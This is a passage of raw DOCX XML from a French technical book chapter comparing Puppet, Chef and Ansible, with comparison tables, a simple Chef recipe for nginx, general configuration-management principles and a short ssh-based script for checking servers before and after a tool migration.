            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Recette</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tâche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Réutilisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Classe et module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Recette et livre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inventaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Console ou ENC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Serveur Chef</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichier d'inventaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Agent pull</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Agent pull</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Push SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Langage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DSL Puppet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ruby</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>YAML</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LE LANGAGE DÉCLARATIF N'INTERDIT PAS L'ORDRE IMPLICITE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Puppet applique les ressources dans un ordre déterminé par les dépendances. Sans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>require</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>before</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>notify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, l'ordre peut surprendre : déclarez explicitement les relations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>77.3 Chef</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chef utilise Ruby pour décrire des recettes. Cette liberté permet des abstractions puissantes, au prix d'une courbe d'apprentissage plus élevée et d'un risque de code difficile à relire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une recette Chef · ruby</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recipes/default.rb</w:t>
        <w:br/>
        <w:t>package 'nginx' do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  action :install</w:t>
        <w:br/>
        <w:t>end</w:t>
        <w:br/>
        <w:br/>
        <w:t>template '/etc/nginx/sites-available/site.conf' do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  source 'site.conf.erb'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  owner  'root'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group  'root'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mode   '0644'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  variables(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    domaine: node['site']['domaine'],</w:t>
        <w:br/>
        <w:t xml:space="preserve">    upstream: node['site']['upstream']</w:t>
        <w:br/>
        <w:t xml:space="preserve">  )</w:t>
        <w:br/>
        <w:t xml:space="preserve">  notifies :reload, 'service[nginx]', :delayed</w:t>
        <w:br/>
        <w:t>end</w:t>
        <w:br/>
        <w:br/>
        <w:t>service 'nginx' do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  action [:enable, :start]</w:t>
        <w:br/>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.291 — Deux colonnes, un bilan</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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Avantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Inconvénient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Écosystème mature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Agent et serveur à exploiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>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Convergence continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Complexité de débogage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gestion fine des dépendances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Langage à maîtriser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>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Adapté aux grands parcs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Surdimensionné pour dix serveurs</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LIVRE DE RECETTES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ensemble de recettes Chef et de leurs dépendances, versionné et publié. Il joue le rôle du module ou du rôle Ansible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>77.4 Choisir sans dogme</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le choix dépend du parc, de l'équipe et de l'existant. Une migration coûte souvent plus cher que le gain attendu, surtout si l'outil actuel fonctionne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.292 — Cinq contextes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Contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Choix raisonnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moins de cinquante serveurs</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Ansible</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Sans agent, rapide à adopter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Parc hétérogène ancien</w:t>
            </w:r>
          </w:p>
        </w:tc>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Conserver l'outil en place</w:t>
            </w:r>
          </w:p>
        </w:tc>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Coût de migration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Convergence permanente exigée</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Puppet ou Chef</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Agents et rapports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Équipe Ruby</w:t>
            </w:r>
          </w:p>
        </w:tc>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Chef</w:t>
            </w:r>
          </w:p>
        </w:tc>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Compétences existantes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Infrastructure conteneurisée</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Images + IaC</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Moins de configuration système</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq invariants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Ce qui compte plus que l'outil</w:t>
        <w:br/>
        <w:t>- Toute la configuration est versionnée</w:t>
        <w:br/>
        <w:t>- Une machine se reconstruit depuis zéro</w:t>
        <w:br/>
        <w:t>- Les secrets sont externalisés</w:t>
        <w:br/>
        <w:t>- Les changements passent par une revue</w:t>
        <w:br/>
        <w:t>- L'état réel est vérifié régulièrement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une organisation qui applique ces cinq règles obtient l'essentiel du bénéfice, quel que soit l'outil. Une organisation qui ne les applique pas n'en tirera rien, même avec l'outil le plus récent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>77.5 Migrations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Remplacer un outil de gestion de configuration est un projet, pas une tâche. Trois précautions évitent les régressions silencieuses.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Inventorier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ce que l'outil actuel gère réellement, y compris les exceptions.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Migrer par périmètre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : un service, puis un groupe, jamais tout à la fois.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Comparer l'état obtenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec l'état attendu, machine par machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une comparaison concrète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Comparer deux machines avant et après migration</w:t>
        <w:br/>
        <w:t>ssh web1 'dpkg -l | sort' &gt; web1-avant.txt</w:t>
        <w:br/>
        <w:t>ssh web1 'systemctl list-unit-files --state=enabled' &gt;&gt; web1-avant.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t># Après migration</w:t>
        <w:br/>
        <w:t>ssh web1 'dpkg -l | sort' &gt; web1-apres.txt</w:t>
        <w:br/>
        <w:t>ssh web1 'systemctl list-unit-files --state=enabled' &gt;&gt; web1-apres.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t>diff web1-avant.txt web1-apres.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.293 — Quatre risques de migration</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83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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Prévention</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration oubliée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
